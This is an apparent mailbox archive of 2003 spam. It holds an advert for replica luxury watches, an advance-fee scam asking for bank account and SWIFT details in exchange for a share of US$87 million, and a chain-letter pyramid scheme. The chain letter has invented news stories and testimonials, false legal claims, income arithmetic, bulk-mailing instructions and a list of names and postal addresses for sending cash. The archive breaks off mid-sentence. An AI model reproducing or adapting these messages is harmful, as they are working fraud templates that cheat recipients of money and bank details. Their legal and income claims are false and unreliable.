Content-Type: multipart/alternative;
	boundary="1CC.07DA04F2D.7___F_7."
X-Priority: 3
X-MSMail-Priority: Normal

This is a multi-part message in MIME format.

--1CC.07DA04F2D.7___F_7.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<p class=3D"MsoNormal"><i><span style=3D"font-size: 10.0pt; font-family: A=
rial">
Please note to send ALL REPLY e-mail direct to our sales representative at=
:
<a href=3D"mailto:Questions@SwissQualityWatch.com" style=3D"color: blue; t=
ext-decoration: underline; text-underline: single">
Questions@SwissQualityWatch.com</a> &nbsp;</span></i></p>
<p class=3D"MsoNormal">Hi,</p>
<p class=3D"MsoNormal">Thank you for expressing interest in ATGWS watches.=
</p>
<p class=3D"MsoNormal">We would like to take this opportunity to offer you=
 our 
fine selection of Italian crafted Rolex Timepieces.</p>
<p class=3D"MsoNormal">You can view our large selection of Rolexes (includ=
ing 
Breitling, Tag Heuer, Cartier etc) at:</p>
<p class=3D"MsoNormal">
<a href=3D"http://www.swissqualitywatch.com/" style=3D"color: blue; text-d=
ecoration: underline; text-underline: single">
www.SwissQualityWatch.com</a></p>
<p class=3D"MsoNormal">For all orders placed in the month of August, <b>al=
l shipping 
and handling charges will be free</b>.</p>
<p class=3D"MsoNormal">As we are the direct manufacturers, you are guarant=
eed of 
lowest prices and highest quality each and every time you purchase from us=
</p>
<p class=3D"MsoNormal">You may also be interested to know that we have the=
 
following brands available in our wide selection as well: </p>
<p class=3D"MsoNormal">1. Leather band Rolex Daytona (Ladies and Men's) </=
p>
<p class=3D"MsoNormal">2. Blancpain</p>
<p class=3D"MsoNormal">3. Fortis</p>
<p class=3D"MsoNormal">4. Jaeger LeCoutre</p>
<p class=3D"MsoNormal">5. Longines</p>
<p class=3D"MsoNormal">6. Mont Blanc</p>
<p class=3D"MsoNormal">7. Movado</p>
<p class=3D"MsoNormal">8. Oris</p>
<p class=3D"MsoNormal">9. Roger Dubuis</p>
<p class=3D"MsoNormal">10. Ulysse</p>
<p class=3D"MsoNormal">11. Zenith</p>
<p class=3D"MsoNormal">12. Audemar Piguet</p>
<p class=3D"MsoNormal">13. Breitling</p>
<p class=3D"MsoNormal">14. Bvglari</p>
<p class=3D"MsoNormal">15. Cartier</p>
<p class=3D"MsoNormal">16. Corum</p>
<p class=3D"MsoNormal">17. Dunhill</p>
<p class=3D"MsoNormal">18. Franck Muller</p>
<p class=3D"MsoNormal">19. Gerard Perregaux</p>
<p class=3D"MsoNormal">20. IWC</p>
<p class=3D"MsoNormal">21. IWC</p>
<p class=3D"MsoNormal">22. Panerai</p>
<p class=3D"MsoNormal">23. Patek Philippe</p>
<p class=3D"MsoNormal">24. Tag Heuer</p>
<p class=3D"MsoNormal">25. Vacheron Constantin</p>
<p class=3D"MsoNormal">If you see anything that might interest you, or if =
you have 
any questions, please don't hesitate to visit our website at:<br>
<![if !supportLineBreakNewLine]><br>
<![endif]>
<a href=3D"http://www.swissqualitywatch.com/" style=3D"color: blue; text-d=
ecoration: underline; text-underline: single">
www.SwissQualityWatch.com</a></p>
<p class=3D"MsoNormal">I certainly look forward to hearing from you.<br>
<br>
Best regards,<br>
<br>
Cal</p>
<p class=3D"MsoNormal">Division Sales Manager<br>
ATGWS&nbsp;</p>
<p class=3D"MsoNormal"><span style=3D"font-size:7.5pt;font-family:Arial">Y=
ou 
received this email because your have previous purchased from, or inquired=
 about 
our product line under ATGWS. If you do not want to receive further mailin=
gs 
from ATGWS, unsubscribe by sending an email with the title heading: DELETE=
 in 
the subject line to
<a href=3D"mailto:stellarremove@cs.com" style=3D"color: blue; text-decorat=
ion: underline; text-underline: single">
stellarremove@cs.com</a>&nbsp;&nbsp; </span>&nbsp;</p>
<p class=3D"MsoNormal"><i><span style=3D"font-size: 10.0pt; font-family: A=
rial">
Please note to send ALL REPLY e-mail direct to our sales representative at=
:
<a href=3D"mailto:Questions@SwissQualityWatch.com" style=3D"color: blue; t=
ext-decoration: underline; text-underline: single">
Questions@SwissQualityWatch.com</a></span></i></p>

--1CC.07DA04F2D.7___F_7.--


From ramonwilliems@tiscali.co.uk Tue Aug 12 14:10:19 2003
Return-Path: <ramonwilliems@tiscali.co.uk>
Received: from mk-smarthost-1.mail.uk.tiscali.com (mk-smarthost-1.mail.uk.tiscali.com [212.74.114.37])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with ESMTP id h7CIAI8b005612;
	Tue, 12 Aug 2003 14:10:19 -0400 (EDT)
Received: from [212.74.114.4] (helo=mk-cpfrontend.uk.tiscali.com)
	by mk-smarthost-1.mail.uk.tiscali.com with esmtp (Exim 4.20)
	id 19mdb1-0002v7-7y; Tue, 12 Aug 2003 19:10:11 +0100
Received: from [80.88.139.232] by mk-cpfrontend.uk.tiscali.com with HTTP; Tue, 12 Aug 2003 19:10:11 +0100
Date: Tue, 12 Aug 2003 19:10:11 +0100
Message-ID: <3F216A9700023F28@mk-cpfrontend-2.mail.uk.tiscali.com>
From: ramonwilliems@tiscali.co.uk
Subject: STRICTLY AND CONFIDENCIAL
To: ramonwilliems@tiscali.co.uk
MIME-Version: 1.0
Content-Type: text/plain; charset="iso-8859-1"
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by netlib2.cs.utk.edu id h7CIAI8b005612

FROM THE DESK: 
DR.RAMON WILLIEMS 
CHIEF ACCOUNTING OFFICER 

ATTENTION: PRESIDENT/DIRECTOR 

I AM DR. RAMON WILLIEMS THE CHIEF ACCOUNTING OFFICER OF A 
BANK. THE FINANCIAL STATEMENT OF OUR BANK IS OVER 
US$300,000,000,000.00 (THREE HUNDRED BILLION UNITED STATES 
DOLLARS) AND THE CURRENT ASSETS OF OUR BANK IS RELATIVELY 
LIQUID RESOURCES. THIS CATEGORIES INCLUDES CASH, 
INVESTMENTS IN MARKETABLE SECURITIES, RECEIVABLE, 
INVENTORIES AND PREPAID EXPENSES. IN RECENT YEARS THE 
ANNAUL REVENUE OF OUR BANK HAS EXCEEDED TO 
US$500,000,000,000.00 (FIVE HUNDRED BILLION UNITED STATES 
DOLLARS) AND MY RESPONSIBITY IS FOR ME TO MAINTAIN 
ADEQUATE MONETARY INTERNAL CONTROL, CONTROLLING THE BANK 
CASH POSITION, BUDGETTING AND FOR THE PREPARATION OF 
ACCOUNTING RECORDS AND FINANCIAL STATEMENT. 

THE NUMBER OF CAPITAL SHARES WHICH HAS BEEN ISSUED FOR THE 
YEAR 2003 IS UNDER MY JURISDICTION IS 
US$300,000,000,000.00 AND THE OUTSTANDING SHARE THAT IS 
PRESENTLY UNDER MY CONTROL AND SUPERVISION IS 
US$87,000,000.00 (EIGHTY SEVEN MILLION UNITED STATES DOLLARS). 
WE ARE IN THE FIRST QUARTER OF THE YEAR 2003 AND I NEED A 
RELIABLE FOREIGN PARTNER THAT WILL ASSIST ME TO TRANSFER 
THE FUND INTO HIS BANK ACCOUNT. I HAVE MANAGERIAL 
AUTHORITY TO TRANSFER THIS FUND INTO YOUR BANK ACCOUNT BY 
ELECTRONIC WIRE TRANSFER. I NEED THE FOLLOWING BANKING 
INFORMATION: 

1. THE NAME OF YOUR BANK 
2. THE BANK ADDRESS 
3. THE BANK ACCOUNT 
4. THE BANK ROUTING/SWIFT CODE 
5. THE BANK BENEFICIARY 
6. YOUR COMPANY NAME 
7. YOUR PRIVATE TEL, FAX AND MOBILE TELPHONE FOR EASY COMMUNICATION 

WITH THE ABOVE INFORMATION, I WILL EFFECT THE PAYMENT OF 
US$87MILLION DOLLARS INTO YOUR NOMINATED BANK ACCOUNT AND 
THIS WILL ONLY TAKE US 24 BANKING WORKING HOURS TO 
EXECUTIVE THIS FINANCIAL BUSINESS TRANSACTION THAT WILL 
BENEFIT BOTH PARTIES. WE HAVE AGREED TO SHARE THE FUND AS 
FOLLOW: 30% WILL BE GIVING TO YOU HAS THE OWNER OF THE 
ACCOUNT WHERE THE FUND WILL BE TRANSFER AND 60% WILL BE 
FOR ME AND 10% FOR VALUE ADDED TAX THAT WILL BE REQUIRED 
BY YOUR BANK OFFICIAL. 

THE BANK WILL SEND YOU VALID CONCRETE AUTHORIZATION 
DOCUMENT AND TELEX CONFIRMATION WILL BE SEND TO YOUR BANK 
AND FOR YOU TO VARIFY FROM YOUR BANK AS SOON AS THE FUND 
HIT YOUR BANK ACCOUNT. 

NOTE: Please kindly state your early response immediately 
on this email: ramonwilliems@yahoo.com for more details 
on the modalities involves in this business and it is top secret 
you have to keep strictly confidential. 

I WILL BE EXPECTING YOUR URGENT COMPLIANCE 
AND FEED BACK. 

YOURS TRULY, 

DR RAMON WILLIEMS 





From tlhlq84w@web-france.fr Fri Aug 22 04:47:02 2003
Return-Path: <tlhlq84w@web-france.fr>
Received: from 160.36.58.108 ([200.87.103.139])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id h7M8kH8b007126
	for <blast-funct-archive@netlib2.cs.utk.edu>; Fri, 22 Aug 2003 04:46:39 -0400 (EDT)
Received: from [47.137.168.80]
	by 160.36.58.108 with ESMTP id <543539-24380>;
	Fri, 22 Aug 2003 08:43:08 -0100
Message-ID: <l5--ri8xml3-1y$c6s2@dyqq01>
From: "Chad Hobbs" <tlhlq84w@web-france.fr>
Reply-To: "Chad Hobbs" <tlhlq84w@web-france.fr>
To: <blast-funct-archive@netlib2.cs.utk.edu>
Subject: Give Your Future Five Minutes ijqbj
Date: Fri, 22 Aug 03 08:43:08 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".C7._13.0D__.AD3EE.A.."
X-Priority: 3
X-MSMail-Priority: Normal


--.C7._13.0D__.AD3EE.A..
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8=
859-1">
   <meta name=3D"GENERATOR" content=3D"Mozilla/4.77 [en] (Windows NT 5.0; =
U) [Netscape]">
   <title>P01</title>
</head>
<body text=3D"#000000" bgcolor=3D"#009900" link=3D"#0000EE" vlink=3D"#551A=
8B" alink=3D"#FF0000">
&nbsp;
<center><table CELLSPACING=3D0 WIDTH=3D"690" BGCOLOR=3D"#FFFFFF" class=3D"=
center" >
<tr>
<td class=3D"backImg">&nbsp;
<center>
<br><b><font face=3D"Arial">DO NOT DELETE THIS - <u>READ FIRST</u> - IT WI=
LL
CHANGE YOUR LIFE!</font></b>
<p><font face=3D"Arial"><font size=3D+2>This <b>Really Works</b>!</font></=
font>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>Give=
 Your
Future Five Minutes And Read This Email</font></font></font></u></b>
<p><b><u><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>It W=
ill
Change Your Life!</font></font></font></u></b>
<p><b><i><font face=3D"Arial">A One Time Investment Of $25 Plus This Simpl=
e
Technology</font></i></b>
<br><b><i><font face=3D"Arial">Could Make You Financially Secure For Life!=
</font></i></b></center>

<blockquote>
<center><font face=3D"Arial">Just Because <b>This&nbsp; Is Easy</b> doesn'=
t
mean it's not <b>Honest</b>, or <b>Real Business</b>.&nbsp; Keep&nbsp;</fo=
nt>
<br><font face=3D"Arial"><b>Working Hard</b> or Learn to <b>Work Smart</b>=
.
What do you think Successful People Do?</font></center>

<blockquote><font face=3D"Arial">This is a completely documented method to=

Get Wealthy and Anyone regardless of Age, Race, State of Health, Country
of origin, or Financial Standing can participate. No Education or Special
Experience is needed. Within the next two weeks you could be well on your
way to a $500,000.00 income. Imagine being able to make over a half millio=
n
dollars every 4 to 5 months from your home.</font></blockquote>

<center><b><font face=3D"Arial">THANK'S TO THE COMPUTER AGE AND THE INTERN=
ET</font></b>
<p><b><font face=3D"Arial"><font size=3D+1>AS SEEN ON NATIONAL TV:</font><=
/font></b></center>

<center><b><font face=3D"Arial">PARENTS OF 15 - YEAR OLD - FIND $71,000 CA=
SH
HIDDEN IN HIS CLOSET!</font></b></center>

<blockquote><font face=3D"Arial">Does this headline look familiar? Of cour=
se
it does. You most likely have just seen this story recently featured on
a major nightly news program (USA). And reported elsewhere in the world.
His mother was cleaning and putting laundry away when she came across a
large brown paper bag that was suspiciously buried beneath some clothes
and a skateboard in the back of her 15-year-old sons closet. Nothing could=

have prepared her for the shock she got when she opened the bag and found
it was full of cash. Five-Dollar Bills, Twenties, Fifties and Hundreds
- all neatly rubber-banded in labelled piles.</font>
<p><font face=3D"Arial">"My first thought was that he had robbed a bank",
says the 41-year-old woman, "There was over $71,000 Dollars in that bag
-- that's more than my husband earns in a year".</font>
<p><font face=3D"Arial">The woman immediately called her husband at the ca=
r-dealership
where he worked to tell him what she had discovered. He came home right
away, and they drove together to the boys school, and picked him up. Littl=
e
did they suspect that where the money came from, was more shocking than
actually finding it in the closet.</font>
<p><font face=3D"Arial">As it turns out, the boy had been sending out, via=

E-mail, a type of "Report" to E-mail addresses that he obtained off the
Internet. Everyday after school for the past 2 months, he had been doing
this right on his computer in his bedroom.</font>
<p><font face=3D"Arial">"I just got the E-mail one day and I figured what
the heck, I put my name on it like the instructions said and I started
sending it out", says the clever 15-year-old.</font>
<p><font face=3D"Arial">The E-mail letter listed 5 addresses and contained=

instructions to send one $5 dollar bill to each person on the list, then
delete the address at the bottom and move the others addresses Down , and
finally to add your name to the top of the list.</font>
<p><font face=3D"Arial">The letter goes on to state that you would receive=

Several Thousand Dollars in Five-Dollar Bills within 2 weeks if you sent
out the letter with your name at the top of the 5-address list. "I get
junk E-mail all the time, and really did not think it was going to work",
the boy continues.</font>
<p><font face=3D"Arial">Within the first few days of sending out the E-mai=
l,
the Post Office Box that his parents had gotten him for his video-game
magazine subscriptions began to fill up with not with magazines, but envel=
opes
containing $5 Bills.</font>
<p><font face=3D"Arial">"About a week later I rode [my bike] down to the
post office and my box had 1 magazine and about 300 envelops stuffed in
it. There was also a yellow slip that said I had to go up to the [post
office] counter. I thought I was in trouble or something (laughs)". He
goes on, "I went up to the counter and they had a whole box of more mail
for me. I had to ride back home and empty out my backpack because I could
not carry it all". Over the next few weeks, the boy continued sending out
the E-mail."The money just kept coming in and I just kept sorting it and
stashing it in the closet, barely had time for my homework".He had also
been riding his bike to several of the banks in his area and exchanging
the $5 bills for twenties, fifties and hundreds.</font>
<p><font face=3D"Arial">"I didn't want the banks to get suspicious so I ke=
pt
riding to different banks with like five thousand at a time in my backpack=
.
I would usually tell the lady at the bank counter that my dad had sent
me in to exchange the money and he was outside waiting for me.One time
the lady gave me a really strange look and told me that she would not be
able to do it for me and my dad would have to come in and do it, but I
just rode to the next bank down the street (laughs)." Surprisingly, the
boy did not have any reason to be afraid.The reporting news team examined
and investigated the so-called "chain-letter" the boy was sending out and
found that it was not a chain-letter at all.In fact, it was completely
legal according to US Postal and Lottery Laws, Title 18, Section 1302 and
1341, or Title 18, Section 3005 in the US code, also in the code of federa=
l
regulations, Volume 16, Sections 255 and 436, which state a product or
service must be exchanged for money received.</font>
<p><font face=3D"Arial">Every five-dollar bill that he received contained
a little note that read, "Please send me report number XYX".This simple
note made the letter legal because he was exchanging a service (A Report
on how-to) for a five-dollar fee.</font>
<p><font face=3D"Arial">[This is the end of the media release. If you woul=
d
like to understand how the system works and get your $71,000 plus - please=

continue reading. What appears below is what the 15 year old was sending
out on the net - YOU CAN USE IT TOO - just follow the simple instructions]=
</font>
<br>&nbsp;
<br>&nbsp;
<p><b><font face=3D"Arial">BE AN INTERNET MILLIONAIRE LIKE OTHERS&nbsp; WI=
THIN
A YEAR!!!</font></b>
<p><font face=3D"Arial"><b>Before you say ''Bull'', please read the follow=
ing.</b>
This is the letter you have been hearing about on the news lately. Due
to the popularity of this letter on the Internet, a national weekly news
program recently devoted an entire show to the investigation of this progr=
am
described below, to see if it really can make people money. The show also
investigated whether or not the program was legal.</font>
<p><font face=3D"Arial">Their findings proved once and for all that there
are ''absolutely NO Laws prohibiting the participation in the program and
if people can "follow the simple instruction" they are bound to make some
mega bucks with only $25 out of pocket cost''.</font>
<p><font face=3D"Arial">DUE TO THE RECENT INCREASE OF POPULARITY &amp; RES=
PECT
THIS PROGRAM HAS ATTAINED, IT IS CURRENTLY WORKING BETTER THAN EVER.</font=
>
<p><font face=3D"Arial">This is what one had to say:&nbsp;</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">''Thanks to th=
is
profitable opportunity". I was approached many times before but each time
I passed on it. I am so glad I finally joined just to see what one could
expect in return for the minimal effort and money required. To my astonish=
ment,
I received a total $ 610,470.00 in 21 weeks, with money still coming in''.=
</font></font></i>
<p><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>Pam =
Hedland</font></font></font></i></b>
<br><b><i><font face=3D"Arial"><font color=3D"#3366FF"><font size=3D-1>For=
t Lee,
New Jersey.</font></font></font></i></b></blockquote>
</blockquote>

<hr width=3D"600" noshade>
<blockquote><font face=3D"Arial">Another said:</font>
<blockquote><i><font face=3D"Arial"><font color=3D"#3366FF">"This program =
has
been around for a long time but I never believed in it. But one day when
I received this again in the mail I decided to gamble my $25 on it. I foll=
owed
the simple instructions and Wa-laa ..... 3 weeks later the money started
to come in. First month I only made $240.00 but the next 2 months after
that I made a total of $290,000.00. So far, in the past 8 months by re-ent=
ering
the program, I have made over $710,000.00 and I am playing it again. The
key to success in this program is to follow the simple steps and NOT chang=
e
anything."</font></font></i></blockquote>

<p><br><font face=3D"Arial">More testimonials later but first...</font></b=
lockquote>
</blockquote>

<center>
<p><b><font face=3D"Arial">PRINT THIS NOW FOR YOUR FUTURE REFERENCE</font>=
</b></center>

<p>
<hr width=3D"85%">
<center><b><font face=3D"Arial"><font color=3D"#FF0000">If you would like =
to
make at least $500,000 every 4 to 5 months easily and</font></font></b>
<br><b><font face=3D"Arial"><font color=3D"#FF0000">comfortably, please re=
ad
the following...THEN READ IT AGAIN and AGAIN !!!</font></font></b></center=
>

<hr width=3D"85%">
<center>
<p><b><font face=3D"Arial">FOLLOW THE SIMPLE INSTRUCTIONS BELOW&nbsp;</fon=
t></b>
<br><b><font face=3D"Arial">AND YOUR FINANCIAL DREAMS WILL COME TRUE!</fon=
t></b></center>

<blockquote>
<blockquote><b><i><u><font face=3D"Arial">INSTRUCTIONS:</font></u></i></b>=

<p><font face=3D"Arial"><font size=3D-1>For each report, send $5 CASH, THE=

NAME &amp; NUMBER OF THE REPORT YOU ARE ORDERING and YOUR E-MAIL ADDRESS
to the person whose name appears ON THAT LIST next to the report. MAKE
SURE YOUR RETURN ADDRESS IS ON YOUR ENVELOPE TOP LEFT CORNER in case of
any mail problems</font>.</font></blockquote>
</blockquote>

<center>
<p><br><b><font face=3D"Arial">WHEN YOU PLACE YOUR ORDER,&nbsp;</font></b>=

<br><b><font face=3D"Arial">MAKE SURE YOU ORDER EACH OF THE 5 REPORTS!&nbs=
p;</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">You will need all 5 reports so that you
can save them on your computer and resell them.</font>
<center>
<p><b><font face=3D"Arial">YOUR TOTAL COST $5 X 5 =3D $25.00</font></b>
<br><font face=3D"Arial">(That's what I spend every time I take my girlfri=
end
to the movies)</font></center>

<p><font face=3D"Arial">Within a few days <b>you will receive, via e-mail,=

each of the 5 reports from these 5 different individuals.</b> Save them
on your computer so they will be accessible for you to send to the 1,000's=

of people who will order them from you. Also make a floppy of these report=
s
and keep it in your desk in case something happens to your computer.</font=
>
<br>&nbsp;
<p><b><font face=3D"Arial">IMPORTANT:</font></b>
<p><font face=3D"Arial"><b>DO NOT</b> alter the names of the people who ar=
e
listed next to each report, or their sequence on the list, in any way othe=
r
than what is instructed below in step '' 1 through 6 '' or you will loose
out on the majority of your profits. Once you understand the way this work=
s,
you will also see how it does not work if you change it. Remember, this
method has been tested, and <b>if you alter it, it will NOT work !!!</b>
People have tried to put their friends/relatives names on all five thinkin=
g
they could get all the money. But it does not work this way. Believe us,
some have tried to be greedy and then nothing happened. So Do Not try to
change anything other than what is instructed. Because if you do, it will
not work for you. Remember, <b><u>Honesty Reaps The Reward!!!&nbsp;</u></b=
></font></blockquote>

<center><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font
size=3D=
+1>This
IS a legitimate BUSINESS. You are offering&nbsp;</font></font></font></u><=
/i></b>
<br><b><i><u><font face=3D"Arial"><font color=3D"#3333FF"><font size=3D+1>=
a product
for sale and getting paid for it.&nbsp;</font></font></font></u></i></b>
<p><b><i><font face=3D"Arial"><font color=3D"#CC0000">Treat it as such and=

you will be VERY profitable in a short period of time</font></font></i></b=
></center>
</blockquote>

<blockquote>
<blockquote><font face=3D"Arial">After you have ordered all 5 reports, tak=
e
this advertisement and REMOVE the name &amp; address of the person in REPO=
RT
# 5. This person has made it through the cycle and is no doubt counting
their fortune. Email them and ask that's what I always did.</font><font fa=
ce=3D"Arial">Move
the name &amp; address in REPORT # 4 down TO REPORT # 5.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 3 down TO REPORT # 4.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 2 down TO REPORT # 3.</font><font
face=3D=
"Arial">Move
the name &amp; address in REPORT # 1 down TO REPORT # 2</font><font
face=3D=
"Arial">Insert
YOUR name &amp; address in the REPORT # 1 Position.</font></blockquote>

<center>
<p><br><font face=3D"Arial"><b>PLEASE MAKE SURE</b> you copy every name &a=
mp;
address <b>ACCURATELY</b></font>
<br><font face=3D"Arial">(Just cut and paste! This is critical to <b>YOUR
</b>success.</font></center>
</blockquote>

<center><font face=3D"Arial">Take this entire letter, with the modified li=
st
of names, and save it on your computer.</font>
<p><b><font face=3D"Arial">DO NOT MAKE ANY OTHER CHANGES</font></b></cente=
r>

<blockquote>
<blockquote><font face=3D"Arial"><b>Save this on a disk as well just in ca=
se
if you loose any data</b>. To assist you with marketing your business on
the internet, the 5 reports you purchase will provide you with invaluable
marketing information which includes how to send bulk e-mails legally,
where to find thousands of free classified ads and much more. There are
2 Primary methods to get this venture going:</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 1: BY SENDING BULK E-MAIL LEGALLY=
</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Let's say that you decide to start small,=

just to see how it goes, and we will assume You and those involved send
out only 5,000 e-mails each. Let's also assume</font>
<p><font face=3D"Arial">that the mailing receives only a 0.2% (2/10 of 1=
%)
response (the response could be much better but lets just say it is only
0.2%). Also many people will send out hundreds of thousands e-mails instea=
d
of only 5,000 each). Continuing with this example, you send out only 5,000=

e-mails.</font>
<p><font face=3D"Arial">With a 0.2% response, that is only 10 orders for
report # 1. Those 10 people responded by sending out 5,000 e-mail each
for a total of 50,000. Out of those 50,000 e-mails only 0.2% responded
with orders. That's=3D100 people responded and ordered Report # 2.</font>
<p><font face=3D"Arial">Those 100 people mail out 5,000 e-mails each for
a total of 500,000 e-mails. The 0.2% response to that is 1000 orders for
Report # 3.</font>
<p><font face=3D"Arial">Those 1000 people send 5,000 e-mail each for a tot=
al
of 5 million e-mail sent out. The 0.2% response is 10,000 orders for Repor=
t
# 4.</font>
<p><font face=3D"Arial">Those 10,000 people send out 5,000 e-mails each fo=
r
a total of 50,000,000 (50 million) e-mails. The 0.2% response to that is
100,000 orders for Report # 5.</font>
<p><font face=3D"Arial">THAT'S 100,000 ORDERS TIMES $5 EACH =3D $500,000.0=
0
(half a million dollars).</font>
<p><font face=3D"Arial">Your total income in this example is: 1... $50 +
2..... $500 + 3..... $5,000 + 4..... $50,000 + 5....$500,000 .... Grand
Total=3D$555,550.00</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+1>NU=
MBERS
DO NOT LIE</font></font></font></b></center>

<blockquote>
<blockquote><b><font face=3D"Arial"><font color=3D"#000000"><font size=3D-=
1>GET
A PENCIL &amp; PAPER AND FIGURE OUT THE WORST POSSIBLE RESPONSES AND NO
MATTER HOW YOU CALCULATE IT, YOU WILL STILL MAKE A LOT OF MONEY! (I did
it was $55,000 in four months)</font></font></font></b>
<p><font face=3D"Arial">REMEMBER, THIS IS ASSUMING ONLY 10 PEOPLE ORDERING=

OUT OF 5,000 YOU MAILED TO. Dare to think for a moment what would happen
if everyone or half or even one 4th of those people mailed 100,000 e-mails=

each or more? There are 580.78 million people on the Internet worldwide
and counting, with thousands of more coming on line every day.&nbsp;</font=
>
<p><font face=3D"Arial">Believe me, there isn't any better way to make mon=
ey!</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial">METHOD # 2: BY PLACING FREE ADS ON THE INT=
ERNET</font></b></center>

<blockquote>
<blockquote><font face=3D"Arial">Advertising on the net is very, very inex=
pensive
and there are hundreds of FREE places to advertise. Placing a lot of free
ads on the Internet will easily get a larger response. We strongly suggest=

you start with Method # 1 and add METHOD #2 as you go along. For every
$5 you receive, all you must do is e-mail them the Report they ordered.
That's it. Always provide same day service on all orders.</font>
<p><font face=3D"Arial">This will guarantee that the e-mail they send out,=

with your name and address on it, will be prompt because they can not adve=
rtise
until they receive the report.</font>
<p><font face=3D"Arial">The reason for the "cash" is not because this is
illegal or somehow "wrong". It is simply about time. Time for checks or
credit cards to be cleared or approved, etc. Concealing it is simply so
no one can SEE there is money in the envelope and steal it before it gets
to you.</font></blockquote>

<center><font face=3D"Arial"><b>ORDER EACH REPORT BY ITS NUMBER &amp; NAME=

ONLY</b>.</font></center>

<blockquote><b><font face=3D"Arial">Notes:</font></b>
<p><font face=3D"Arial">Always send $5 cash (U.S. CURRENCY) for each Repor=
t.
Checks NOT accepted. Make sure the cash is concealed by wrapping it in
at least 2 sheets of paper or foil will also work. On one of those sheets
of paper, write the NUMBER &amp; the NAME of the Report you are ordering,
YOUR E-MAIL ADDRESS and your name and postal address.</font></blockquote>
</blockquote>

<center><b><font face=3D"Arial"><font size=3D+1>AVAILABLE REPORTS</font></=
font></b>
<br><b><font face=3D"Arial">PLACE YOUR ORDER FOR THESE REPORTS NOW:</font>=
</b></center>

<br>&nbsp;
<center><table WIDTH=3D"80%" class=3D"center" >
<tr>
<td WIDTH=3D"30%" BGCOLOR=3D"#009900" class=3D"left">&nbsp;</td>

<td>
<br><b><font face=3D"Arial">REPORT #1:&nbsp;</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Advertisi=
ng
For Free On The Net"&nbsp;</font></font>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Order Report #1 From=
:</font></font></b>
<blockquote><b><font face=3D"Arial,Helvetica"><font size=3D-1>S. Turner</f=
ont></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>405 N. Clippert Box =
1517</font></font></b>
<br><b><font face=3D"Arial,Helvetica"><font size=3D-1>Lansing, MI. 48912</=
font></font></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #2:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"The Insider's Guide To Sending B=
ulk
E-mail On The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #2 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>C. Bernerd</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 319</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #3:</font></b>
<br><font face=3D"Arial"><font color=3D"#000000"><font size=3D-1>"Secret T=
o Multilevel
Marketing On The Net"</font></font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #3 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>Mike W.</font></font><=
/b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 297</font></font></b>=

<br><b><font face=3D"Arial"><font size=3D-1>Kure Beach, NC 28449</font></f=
ont></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #4:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Become A Millionaire Util=
izing
MLM &amp; The Net"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #4 From:</font></=
font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>M. Eiseman</font></fon=
t></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 451971</font></font><=
/b>
<br><b><font face=3D"Arial"><font size=3D-1>Sunrise, FL 33345-1971</font><=
/font></b></blockquote>

<hr width=3D"350">
<br><b><font face=3D"Arial">REPORT #5:</font></b>
<br><font face=3D"Arial"><font size=3D-1>"How To Safely Send 1 Million Ema=
ils
For Virtually No Money"</font></font>
<br><b><font face=3D"Arial"><font size=3D-1>Order Report #5 From:&nbsp;</f=
ont></font></b>
<blockquote><b><font face=3D"Arial"><font size=3D-1>R. Chernick</font></fo=
nt></b>
<br><b><font face=3D"Arial"><font size=3D-1>P.O. Box 771661</font></font><=
/b>
<br><b><font face=3D"Arial"><font size=3D-1>Coral Springs, FL 33077-1661</=
font></font></b></blockquote>
</td>
</tr>
</table></center>

<blockquote>
<blockquote>
<center><b><font face=3D"Arial"><font size=3D+0>There are currently more t=
han
570,000,000 people online worldwide!</font></font></b></center>
</blockquote>

<center><b><font face=3D"Arial"><font color=3D"#FF0000"><font size=3D+2>$$=
$$$$$
YOUR SUCCESS GUIDELINES $$$$$$$</font></font></font></b></center>

<blockquote><font face=3D"Arial">Follow these guidelines to guarantee your=

success:</font>
<p><font face=3D"Arial">If you do not receive at least 10 orders for Repor=
t
#1 within 2 weeks, continue sending e-mails until you do.</font>
<p><font face=3D"Arial">After you have received 10 orders, 2 to 3 weeks af=
ter
that you should receive 100 orders or more for REPORT # 2. If you did not,=

continue advertising or sending e-mails until you do.</font>
<p><font face=3D"Arial">**Once you have received 100 or more orders for Re=
